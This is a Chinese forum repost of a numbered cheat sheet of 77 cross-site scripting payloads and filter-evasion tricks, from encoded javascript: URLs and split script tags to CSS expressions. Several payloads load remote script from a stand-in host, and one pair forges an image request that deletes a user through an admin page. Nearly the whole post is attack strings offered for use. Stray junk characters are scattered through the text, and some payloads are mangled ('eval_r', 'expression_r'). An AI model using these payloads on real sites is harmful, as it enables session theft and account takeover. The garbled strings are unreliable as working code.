貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
; g4 F5 ^& k% y/ s(1)普通的XSS JavaScript注入
6 O- Q, j$ W- f* E0 @2 ~3 u8 M<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>% y- F( h7 {$ L1 F. K1 H
(2)IMG标签XSS使用JavaScript命令! S( P3 Z0 D) N! Q7 H: ~7 y8 t
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
' o1 t5 x$ ^7 a- t+ |! X(3)IMG标签无分号无引号) j/ H1 j1 h/ g, F
<IMG SRC=javascript:alert(‘XSS’)>
) `. _# A: O4 \' g/ m(4)IMG标签大小写不敏感3 J9 ]9 z' M! B
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>+ M- ^. [; m- B( d: e; j0 p
(5)HTML编码(必须有分号): f, K% Z4 S) W8 q* |' R( l% d
<IMG SRC=javascript:alert(“XSS”)>
9 n2 q' O2 ^: V, }4 s2 _2 S5 S(6)修正缺陷IMG标签, ]6 w7 S1 T9 Q# G/ [" g" }
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
: D2 B2 l% K* M9 H( ?$ A9 z! Z; J& k) O* o
) `# F5 i" w: K(7)formCharCode标签(计算器)
: ?, X5 q {% x: P( h0 S9 u( `<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>" [: B( w- r8 {% I0 V: x: v! }
(8)UTF-8的Unicode编码(计算器); I) T3 N( L' H- r' [$ [0 \0 o
<IMG SRC=jav..省略..S')>1 ]6 G$ a4 H* j/ w
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)7 E: Z& Y7 J; i) B: R6 ~- G
<IMG SRC=jav..省略..S')>
" G5 m. v! t, y) T7 {( _! Q3 q6 G(10)十六进制编码也是没有分号(计算器)8 @4 ]. l" F6 z/ O$ n3 f
<IMG SRC=java..省略..XSS')>
0 ?1 b0 _7 B+ C+ X(11)嵌入式标签,将Javascript分开3 F6 E+ A8 ]7 i9 f
<IMG SRC=”jav ascript:alert(‘XSS’);”>
& M: _5 u, Q+ n6 c! @- P$ a(12)嵌入式编码标签,将Javascript分开3 ?. s( Z& I2 G& O$ n& W0 A# }( ^
<IMG SRC=”jav ascript:alert(‘XSS’);”>* E1 O" v/ t# ^4 N6 Z$ ]
(13)嵌入式换行符
1 V# N* [: G: G; F! X; t! |<IMG SRC=”jav ascript:alert(‘XSS’);”>
7 p: L- K( z! J: Y4 o8 x8 K- M4 ?(14)嵌入式回车0 R; k' ^# L- C: p2 `9 K2 z$ B$ J
<IMG SRC=”jav ascript:alert(‘XSS’);”>
- V9 m0 ^7 w$ P/ v, K- S(15)嵌入式多行注入JavaScript,这是XSS极端的例子
2 Q9 Z" w1 J" U<IMG SRC=”javascript:alert(‘XSS‘)”>
* R7 Y& t) O, U(16)解决限制字符(要求同页面)
! R' {2 v# j4 _/ G* i9 K* B$ G<script>z=’document.’</script>; i% p0 n3 p- J5 t m
<script>z=z+’write(“‘</script>
: {' I$ V/ {5 G9 c1 ~6 F$ @<script>z=z+’<script’</script>
! ?# e+ M6 U" D) y3 Q/ Y<script>z=z+’ src=ht’</script># n# }* x# J' C4 Y" R8 s
<script>z=z+’tp://ww’</script>
: L4 Z0 _9 J0 j# v* ?# V<script>z=z+’w.shell’</script>; C0 I6 d+ r5 x4 A
<script>z=z+’.net/1.’</script>& y! C: E; ?0 k: f
<script>z=z+’js></sc’</script>- Z' i6 _1 s! K: [) A
<script>z=z+’ript>”)’</script>
4 {: T' a9 t( u2 m- g: p<script>eval_r(z)</script>
- K2 c8 ?8 A2 K$ R4 @( ~( }' H- y(17)空字符12-7-1 T00LS - Powered by Discuz! Board0 @; a* u' L' [7 ]' [: q0 r
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
7 N" S+ S1 T5 e# _ J. Dperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out6 w5 p' x: i C4 O0 ^8 Q& s8 v& _
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
% ]; ?* C" j9 W- J; n9 Nperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
9 D3 N: P7 d8 u(19)Spaces和meta前的IMG标签
2 J/ N# ^ F+ N3 T0 X<IMG SRC=” javascript:alert(‘XSS’);”>
2 Q7 u0 v* c1 z+ f* J(20)Non-alpha-non-digit XSS
! W" V6 h( L* w9 y1 Z: q$ z<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
" n( X: L) a$ _: A. \6 o* l2 L! D(21)Non-alpha-non-digit XSS to 2
5 D+ K' Y7 H6 n/ t) I<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
U k9 v* ~' F8 v5 K2 Q(22)Non-alpha-non-digit XSS to 3- B L3 F7 {$ }3 ]; i ]7 P2 R' J
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>- g% m$ S" J2 z# d5 D
(23)双开括号
0 d- ] B5 B% @<<SCRIPT>alert(“XSS”);//<</SCRIPT>
. _+ B" f/ @# M+ ~; x2 T7 C4 W6 y(24)无结束脚本标记(仅火狐等浏览器)
7 c6 j+ {1 e( B& X<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>4 M! K! \" q7 \
(25)无结束脚本标记2* |+ L( W: s7 I" M: N$ {6 G) f
<SCRIPT SRC=//3w.org/XSS/xss.js>
( R% s" o [ E a(26)半开的HTML/JavaScript XSS
4 f; O. Q. Y+ U3 ?<IMG SRC=”javascript:alert(‘XSS’)”
# @' z) `8 H/ r, Z4 i$ ?3 X1 g: N(27)双开角括号1 Q4 O' D2 Q2 D, I4 g
<iframe src=http://3w.org/XSS.html <
" K2 s5 ?/ d8 C/ K(28)无单引号 双引号 分号 O6 ~0 x! q' G7 l/ [0 n/ [/ g
<SCRIPT>a=/XSS/
5 B9 l& U: j8 `alert(a.source)</SCRIPT>+ B8 ]7 _6 K0 p! p/ s
(29)换码过滤的JavaScript
' ]* i$ Y# [# K% z" h2 Z+ d7 w\”;alert(‘XSS’);//
, D2 J# o) c0 E8 }(30)结束Title标签
1 A n; e. M9 O</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
7 r- i/ K( L1 \" ? A; _(31)Input Image6 Z8 P* _- g# m" c, P
<INPUT SRC=”javascript:alert(‘XSS’);”>! \! X' y! K/ R( y& M8 ~
(32)BODY Image- L/ b5 X8 ?- O! q4 `) S( n
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
2 ~& M7 [; P; }4 F(33)BODY标签3 q' a" x/ i9 j
<BODY(‘XSS’)>
3 k# E) K; F+ U; [* J(34)IMG Dynsrc
8 @, |* o# P7 m* _. j<IMG DYNSRC=”javascript:alert(‘XSS’)”>$ d/ E, V& V; K+ |1 e
(35)IMG Lowsrc& g ^4 Z' d$ G7 r7 n
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
0 p) N" ]* C. p6 t(36)BGSOUND6 T( C' h& x# v/ w8 K
<BGSOUND SRC=”javascript:alert(‘XSS’);”>. D0 G1 b( w1 R2 x) Y. Q
(37)STYLE sheet! s6 ~& K4 u) [/ @, x3 Y4 L* O
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
9 _, E# t0 p7 L9 |3 ?; L5 y) }(38)远程样式表
% N6 t O, R. ]6 E0 H<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
1 C' \$ g2 t2 ~: h& U2 V(39)List-style-image(列表式)
1 y! N0 b9 v1 O7 {4 `<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS1 r0 j" ^- t$ n+ [6 T& p; @
(40)IMG VBscript
8 l. W7 W% T: G1 |9 L$ j# [<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
) g" A1 h! _+ `: w5 Y; c(41)META链接url# J! s5 X5 D O1 }9 X
( G- ^$ y/ `4 X# I1 E! V
" W2 ?0 v, z& w- U: a8 V- b
<META HTTP-EQUIV=”refresh” CONTENT=”0;
3 D: Q" U$ | B. PURL=http://;URL=javascript:alert(‘XSS’);”>& u7 t1 s; q+ T. K; L2 C
(42)Iframe' z: P( c8 H0 J. C# U& o
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
; ?$ Q% |- e# f' O& w; f(43)Frame
2 p( U. W8 E- ]! c8 } g5 r2 ~. w<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
- n: L# V" Z% V( a" [https://www.t00ls.net/viewthread ... table&tid=15267 3/6
8 e3 F+ q- ^/ q) s* A( _, J(44)Table
5 v* X/ X( c# Y3 w, e d% G<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
~5 e4 E3 Z' a2 n(45)TD
7 H6 U$ J- v. q. o4 |' V<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
' T; ~5 c; u) ]9 e/ y/ J$ [, g, }(46)DIV background-image
+ }2 j2 i6 i& Y3 e/ V<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
- Y K& t) ^3 b t, ~(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
5 S, d9 ^" u2 m5 j8&13&12288&65279)& [ S. l0 T d B
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
L4 w& T7 [2 k2 H(48)DIV expression
, r3 T- y; }8 ~0 Z3 D4 W<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
$ n' I& r7 u6 p2 D3 p2 V(49)STYLE属性分拆表达- T+ |8 n8 u, U' z& \2 B+ C
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
) x# N' |: f8 F" `( A1 Q( ?(50)匿名STYLE(组成:开角号和一个字母开头)
& b8 M( F; L \- f* {6 ~<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
q7 V" q2 R" E) g9 G! O5 ], `0 B(51)STYLE background-image7 q x0 g: g# r+ [) S# V6 \' j" }
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A4 C- K. i! s4 y! |& y
CLASS=XSS></A>
3 b, x# O; Z! b: h(52)IMG STYLE方式% N2 K0 B# I4 G6 l
exppression(alert(“XSS”))’>3 N; K" U X2 L" K
(53)STYLE background% s) w3 B( W9 ?0 f+ }& g& \
<STYLE><STYLE
7 O& R) p$ G5 s& A ^* b5 Ztype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE># f" L; H' F5 n2 V) h& ]: S: `
(54)BASE/ V- Z9 T Z* ~7 P0 N
<BASE HREF=”javascript:alert(‘XSS’);//”>6 J) A3 X$ M" N5 ?- Q' ]& t
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS" m( O! \7 j8 C N0 \$ m5 d l5 X
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>7 I, [5 }, R, m) G! a% z; L
(56)在flash中使用ActionScrpt可以混进你XSS的代码 N& k, A3 V E7 r
a=”get”;
3 c% {' m* Y) Z0 J( ?6 g5 G; kb=”URL(\”";6 a# {: R2 H, [8 D& J+ e
c=”javascript:”;/ N# `* W% q& t
d=”alert(‘XSS’);\”)”;
4 K8 M! }" C. @8 y% y! Z- j5 G) Seval_r(a+b+c+d);
3 ^# H2 j4 w& e' B6 ~% f(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上% V% D/ ~% U% X& b
<HTML xmlns:xss>& ?5 R! N/ y- e6 A1 b- T3 o+ Z
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>, w6 k! ?+ w. `5 |4 w$ G8 ~9 ]
<xss:xss>XSS</xss:xss>9 d& C: j: ~# z( p+ X$ z2 p9 W0 U
</HTML>
9 m$ m S, k9 x; \ U(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
3 x- g6 I7 {8 F0 [ Z! r- `, b<SCRIPT SRC=””></SCRIPT>/ Q' H: D0 G2 [6 [) L/ E; g
(59)IMG嵌入式命令,可执行任意命令9 @; h/ O4 K: ]
<IMG SRC=”http://www.XXX.com/a.php?a=b”>3 e6 j# c4 N9 ]/ A1 v
(60)IMG嵌入式命令(a.jpg在同服务器)* n3 W: G& ^7 L& ?$ n7 B
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
; | C& f# |( w2 q6 X. |, v(61)绕符号过滤
- e6 f" {4 P) R. `. p: \! }<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>) ^+ v( u2 ]6 s1 G0 Z
(62)
& O0 r# ^! G2 w+ `( d0 m<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
/ m. r% B: Z; ~! ~* a# D(63): X9 F% p# B L7 I
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT># \# `) k- Y: u# Z* r
(64)
) b7 c% | S9 d( k( _<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>6 v& ], E% Q/ T$ k. ]
(65)
/ Z" n0 Y3 Z3 O* _. i, v- U<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
! w+ A q. R: B/ H/ M(66)12-7-1 T00LS - Powered by Discuz! Board0 F, Q' A& k& z* c: B0 e( e, ~! G8 l- G
https://www.t00ls.net/viewthread ... table&tid=15267 4/6
4 K* s, _) M+ H0 C' E6 a/ A/ w<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT> f% |6 e+ y7 Q' u+ B4 [+ ], @# ]6 x
(67)) J) m* K. @- `+ E: o
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>" ?5 V; y9 l0 V8 {6 q- W
</SCRIPT>
: E8 O- O9 w7 G' p5 i(68)URL绕行* B7 a$ y3 { X% u) E9 ~
<A HREF=”http://127.0.0.1/”>XSS</A>
3 o" X5 r, w9 `, l! A2 \(69)URL编码
% i2 J( u" ~) ]4 w0 I+ s<A HREF=”http://3w.org”>XSS</A>
' w0 e6 a2 S% w% q(70)IP十进制
9 |9 R* y# v) m c<A HREF=”http://3232235521″>XSS</A>
+ [: R* y/ ?4 K8 |7 q$ M(71)IP十六进制, T+ M4 E+ F! d0 `( \. J& E2 O( m
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
4 S/ R- [5 i* z; l! z) u+ r(72)IP八进制
2 }9 z& U+ \& B3 k9 b% B<A HREF=”http://0300.0250.0000.0001″>XSS</A>- {; Q p1 z/ a/ {2 ?5 k% b
(73)混合编码
W( K% U9 ~" v& E/ I* e<A HREF=”h* W s6 O, P; o L0 A( K J1 l
tt p://6 6.000146.0×7.147/”">XSS</A>
( _3 ^( z4 z& J(74)节省[http:]
6 i2 ?+ ]) x. T& L* p% f<A HREF=”//www.google.com/”>XSS</A>% K/ l" Z ?. q$ f- O n' J
(75)节省[www]5 j2 l% U9 i3 p2 d2 x$ X
<A HREF=”http://google.com/”>XSS</A>- _# a* o( R# i% w& i' J$ E) m0 X
(76)绝对点绝对DNS
& u3 t! h( D, W: L$ v: X$ X<A HREF=”http://www.google.com./”>XSS</A>0 k$ `9 {- y% s" e# Q
(77)javascript链接
# T8 x2 O0 Z6 ?& P1 Y<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
( X( m+ F# f2 g# s& W% r/ I% k" Y2 R( I& F+ S1 E
原文地址:http://fuzzexp.org/u/0day/?p=14" l- p5 F6 T% m) m* T
6 C3 Q% o& O, a* h& N
|
发表于 2013-4-19 19:22:37
收藏
支持
反对